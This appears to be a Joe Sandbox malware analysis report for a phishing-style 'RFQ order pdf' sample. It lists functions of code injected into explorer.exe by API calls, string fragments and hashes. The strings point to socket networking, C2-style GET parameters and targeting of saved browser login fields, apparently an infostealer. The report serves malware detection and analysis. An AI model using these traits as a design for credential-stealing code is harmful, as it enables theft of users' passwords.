Instruction ID: cf8ea444b8e580e21110bfaedaec8086839a30b4b3bda6d4a713893810f8fec0
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: CA81DE70E012598EEF25CE6CCC907FEBBB2AF55720F1C451AE861A7399C7308841CBA5

Function 016820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0168214F
___swprintf_l.LIBCMT ref: 01682172

Strings

]:%u, xrefs: 01682169
[, xrefs: 0168212B
%%%u, xrefs: 01682146

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: d807bfb0adc9a46fe5c81a065b820ba9d95170cb1d56921d959f46d3de61e5ce
Instruction ID: faa2f5c2df4790370cb84836ef370461489aa2b195ca6e2ab6f943ed073e6339
Opcode Fuzzy Hash: d807bfb0adc9a46fe5c81a065b820ba9d95170cb1d56921d959f46d3de61e5ce
Instruction Fuzzy Hash: D821657AA00119ABDB10EF79CC50AFE7BF9EF54641F54011EEA45E3204E730DA15CBA1

Function 015FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016402E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016402BD
RTL: Re-Waiting, xrefs: 0164031E

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 036ba71c880b657eea9a155099776c5fa2959b3639ad5c053df3cef4d7a93129
Instruction ID: 3c4e0c2430ff69e935962ef3eb260d0cfe018f910f7c33dc96a9e803480b1891
Opcode Fuzzy Hash: 036ba71c880b657eea9a155099776c5fa2959b3639ad5c053df3cef4d7a93129
Instruction Fuzzy Hash: D4E1DE326047429FD725CF28C884B6ABBE1BF88714F144A5EF6A58B7E1DB74D844CB42

Function 0160BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01647B7F
RTL: Re-Waiting, xrefs: 01647BAC
RTL: Resource at %p, xrefs: 01647B8E

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 16f26cfd364800c20624b7761f824253ed780ba2ba8c18bee429d358febfc4d9
Instruction ID: 25b596e2ba3af5a01ec735de879af6806ab70b934ae38a1761c924a1b16fa899
Opcode Fuzzy Hash: 16f26cfd364800c20624b7761f824253ed780ba2ba8c18bee429d358febfc4d9
Instruction Fuzzy Hash: BF41B0353007029FD72ADE29CC40B6BB7E5EB98710F104A1DFA5A9B780DB71E8458B96

Function 0160B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0164728C

Strings

RTL: Re-Waiting, xrefs: 016472C1
RTL: Resource at %p, xrefs: 016472A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01647294

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 5fe3fd9fb6ae367bf13822fb95e0062c44e7b0b3c9e55da8c634731daad766a7
Instruction ID: e1238dfcfdae055a42ce7875f05afb3fd8e61356c544f87e901477b7f4c96a9f
Opcode Fuzzy Hash: 5fe3fd9fb6ae367bf13822fb95e0062c44e7b0b3c9e55da8c634731daad766a7
Instruction Fuzzy Hash: 5741FD36701206ABC726CE29CC41B6BBBA6FB94710F14861DFD55AB380DB21E8428BD5

Function 01682300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0168238D
___swprintf_l.LIBCMT ref: 016823B3

Strings

%%%u, xrefs: 01682384
]:%u, xrefs: 016823AA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 600f8f4200974141110fdaa2e6783cb977045a1ea0123588a816c6dc7dee7504
Instruction ID: 29e06732338423ee4b1bb3371d61e4d00436fcb68d1b9a4771ba9b6a7cf0041f
Opcode Fuzzy Hash: 600f8f4200974141110fdaa2e6783cb977045a1ea0123588a816c6dc7dee7504
Instruction Fuzzy Hash: 7A318476A006199FDB20DE2DCC60BEEB7F9FF44610F84455DE949E3200EB309A54CBA0

Function 01617D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01617E8B

Strings

-, xrefs: 01617DDD
+, xrefs: 01617DE8

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: ace941460e368821aa6f428ddda428c04fbb94928c2701d23176c5c0dadd7102
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 75919F71E0020A9EEB24DF6DCC81ABFBBA5AF44320F6C851AE955E73C8D7309941CB51

Function 015D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 015D9175
$, xrefs: 015D9191

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 48ce21ca832979924d87d715c0fd444eecdc9dcb7635dc7852b2e4db1322e03f
Instruction ID: e69fd9672c7834d4cc505d899c1589fd873e7f0d378dea599e4ec067329f5ce9
Opcode Fuzzy Hash: 48ce21ca832979924d87d715c0fd444eecdc9dcb7635dc7852b2e4db1322e03f
Instruction Fuzzy Hash: 73810B71D0026A9BDB35CB58CC55BEEB6B4BF48714F0041DAEA19B7280D7705E85CFA4

Function 0165CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0165CFBD

Strings

@, xrefs: 0165CF0A
@4Qw@4Qw, xrefs: 0165CFD5, 0165CFDA, 0165CFF1

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: d9afd90ce97b9ff5fada16d438146dd9d271d4decd7db5176ee73fc156c07990
Instruction ID: e9a2aca69c09de0288bba976b35c3db30cb2c2bf609d81ea7adf7d82fab86f8e
Opcode Fuzzy Hash: d9afd90ce97b9ff5fada16d438146dd9d271d4decd7db5176ee73fc156c07990
Instruction Fuzzy Hash: AE418A759002169FCB219FA9CC80ABEBBB8FF94B50F00842EE905DB394E7749801CB65

Analysis Process: explorer.exePID: 4084, Parent PID: 7856COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.4%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 1004BF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 1004C12E
setsockopt.WS2_32 ref: 1004C830
recv.WS2_32 ref: 1004C859

Strings

&un=, xrefs: 1004C4F1
GET , xrefs: 1004C318
nnec, xrefs: 1004C32A
tion, xrefs: 1004C331
&br=, xrefs: 1004C509
dat=, xrefs: 1004C290
: cl, xrefs: 1004C338
&sql, xrefs: 1004C471
Co, xrefs: 1004C323
ose, xrefs: 1004C33F

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 1d5936fec6d66701eb97fe84aa39020601d7d8e6b391c07e25e09d623e937a4f
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: F8527C34618A488BC799EF68C484BE9B7E1FB54300F61463ED49FC7146DE70A94ACB89

Function 1004B232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 1004B449

Strings

`, xrefs: 1004B41D

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 42a9f3d9c968f1000b233ac671da67104f4fce8e61e2a915b7d4f3fe68b143be
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: C0225B70A18E099FCB99DF28C4956AEF7E1FB98301F61422EE45ED3250DF30A951CB85

Function 1004CE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 1004CE67

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 018acd58a184da27e041f39704ca1070b3e968e95d4be977dfbe9a16ff3791ae
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: B901B134628B884F8B88EF6CD48112AB7E4FBCE314F000B3EE99AC3250EB70C5414742

Function 1004CE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 1004CE67

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 8312eda5a20897b7c46d4e238a2af1826c13a20dabc896b54fc0d08c45ab896c
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 7A01A234628B884B8B88EB2C94412A6B3E5FBCE314F000B3EE99AC3241DB21D5024786

Function 100468C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 100469A0

Strings

nt: , xrefs: 1004691E
User-Agent: , xrefs: 10046935, 10046948
on.d, xrefs: 10046902
urlmon.dll, xrefs: 10046959

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 12352b4b66a9a6e1ba4ca79ca8521fb2009ffa2f50f35d6b76387e497d6514dd
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: F331D131614A0C8BCB45EFA8D8857EDBBE0FB58204F40023AE44ED7241DF749A45C789

Function 100468BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 100469A0

Strings

nt: , xrefs: 1004691E
User-Agent: , xrefs: 10046935, 10046948
on.d, xrefs: 10046902
urlmon.dll, xrefs: 10046959

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 5e0771aedf979dc17f07d193dab303b8f440427780d672f5b97657b9d3ba35f4
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 5721E470A14A4C8BCB45EFA8C8857EDBBE4FF58204F50423AE45AD7241EF749A05C789

Function 10042B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10042CCA

Strings

kern, xrefs: 10042B99
.dll, xrefs: 10042BCD
el32, xrefs: 10042BA0

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: cc5c0b5bc6e3184ec286cb61234ceb1c98984af0448582e26a0ddcfddb8d4057
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 7D415E74928A088FDB84EFA8C4D57AD77E0FF58300F50457AD84EDB256DE309A45CB85

Function 10042B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10042CCA

Strings

kern, xrefs: 10042B99
.dll, xrefs: 10042BCD
el32, xrefs: 10042BA0

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 5f8329303e48748cf3c55cba1bd8cd69fde32e4a97663a5de5b513a592375317
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: D3412A74928A088FDB84EFA8C4D97AD77E0FF58300F54417AD84EDB256DE309A45CB85

Function 1004872E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10048791

Strings

ect, xrefs: 10048761
conn, xrefs: 1004875A

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: ed9d314c76946012e6dd1142c4947e416b41e52621ba12d8f964c341d189a47f
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: AD010C74618B188FCB84EF5CE088B55B7E0EB59314F1545AAA90DCB266C674D9818BC2

Function 10048732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10048791

Strings

ect, xrefs: 10048761
conn, xrefs: 1004875A

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: a59c452e9a658968597884b8883f7687426a09244f6abbc4a91c08d7eeb10d35
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 79012170618A1C8FCB84EF5CE048B5577E0FB59314F1545BEA90DCB226C674CD818BC2

Function 100486B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 10048713

Strings

send, xrefs: 100486DA

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: a34ff76fc80424a8d6a1fcd21e1457c05d826da70be860b00f902ba1261e415c
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 0901127051CA188FDB88DF1CD049B1577E0EB58314F1645BED85DCB266C670D881CB85

Function 100485B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 10048611

Strings

sock, xrefs: 100485D9

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: f13251163424d9570b9d9703a2cf2a8cc9a43a9daec754debf492c1b041d4f42
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 33012170618A188FCB84DF1CD048B54BBE0FB59354F1545ADE45ECB266C7B0C981CB86

Function 100402DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 1004032D

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 2b56d5132d74e504287e105dff00536e4315e205b17d0510fe3255404ef768e0
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 3E319CB4614B49DFCB94DF698088295BBE0FB44301F64427EE91DDB107CB30AA50CF95

Function 10040412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 10040461

Memory Dump Source

Source File: 00000008.00000002.3850974219.000000000FF80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ff80000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: b0b0c6a08da6582404aa4dd698a229a41ad5208c42beb859374bfcaff5a94e5d
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 51F0FC34268E494FD788EF2CD44563AF3D0FBE8215F41053EA54DC3255DA75D5414715

Non-executed Functions

Function 106D6D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

ll, xrefs: 106D6F13
M, xrefs: 106D7082
32.d, xrefs: 106D6F0B
.dll, xrefs: 106D6F2F
dll, xrefs: 106D6F4C
el32, xrefs: 106D6F27
net., xrefs: 106D6F44
kern, xrefs: 106D6F5A
user, xrefs: 106D6F03
wini, xrefs: 106D6F72
S, xrefs: 106D7073

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 54728d6b0555d6031522b7640eb73655b4c44fe005653315057e06fbbda1c0ad
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 2BE15B74618F488FC7A4DF68C8957AAB7E0FB58300F504A2EA59FC7245DF34A541CB89

Function 1055AD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

net., xrefs: 1055AF44
dll, xrefs: 1055AF4C
M, xrefs: 1055B082
.dll, xrefs: 1055AF2F
32.d, xrefs: 1055AF0B
el32, xrefs: 1055AF27
S, xrefs: 1055B073
ll, xrefs: 1055AF13
wini, xrefs: 1055AF72
user, xrefs: 1055AF03
kern, xrefs: 1055AF5A

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 746991ff57b76caf3a299cffe7195cf5d64ea25d31505042ec224d4c06426caa
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 76E16C74518F488FC7A4DF68C4997AABBE1FB98300F504A2EA59FC7241DF30A545CB89

Function 106D9792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

d, xrefs: 106D98F2
swor, xrefs: 106D98EA
guid, xrefs: 106D97CE
rnam, xrefs: 106D98B5
ypte, xrefs: 106D98DA
ypte, xrefs: 106D98A5
form, xrefs: 106D984D
encr, xrefs: 106D989D
encr, xrefs: 106D98D2
user, xrefs: 106D9876
e, xrefs: 106D98BD
Fiel, xrefs: 106D9884
dPas, xrefs: 106D98E2
dUse, xrefs: 106D98AD
itUR, xrefs: 106D985D
Subm, xrefs: 106D9855
name, xrefs: 106D987D

Memory Dump Source

Source File: 00000008.00000002.3851276803.0000000010610000.00000040.80000000.00040000.00000000.sdmp, Offset: 10610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10610000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 5591131c7f7e920b221f83fd1d437830018b31585919d95eaa9e1361d0076087
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: A3B1AD30519B488EDB94DF69C486AEEB7F1FF98300F40451EE49ACB251EF30A545CB86

Function 1055D792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

form, xrefs: 1055D84D
Fiel, xrefs: 1055D884
dPas, xrefs: 1055D8E2
e, xrefs: 1055D8BD
name, xrefs: 1055D87D
guid, xrefs: 1055D7CE
encr, xrefs: 1055D8D2
Subm, xrefs: 1055D855
encr, xrefs: 1055D89D
ypte, xrefs: 1055D8DA
d, xrefs: 1055D8F2
itUR, xrefs: 1055D85D
swor, xrefs: 1055D8EA
user, xrefs: 1055D876
ypte, xrefs: 1055D8A5
rnam, xrefs: 1055D8B5
dUse, xrefs: 1055D8AD

Memory Dump Source

Source File: 00000008.00000002.3851132143.0000000010480000.00000040.00000001.00040000.00000000.sdmp, Offset: 10480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10480000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 888edbdf824a9a10a188dd2096bb361cdab7e37379b204bbf54b1a9378924787
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 95B18D34518B488EDB55EF68C489AEEBBF1FF98304F50451EE49AC7251EF70A409CB86

Function 106D7622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 106D766D
p, xrefs: 106D7690
u, xrefs: 106D7661
l, xrefs: 106D7682
l, xrefs: 106D76AC
i, xrefs: 106D769E
n, xrefs: 106D76BA
d, xrefs: 106D76A5
n, xrefs: 106D76C1
2, xrefs: 106D7674
s, xrefs: 106D7689
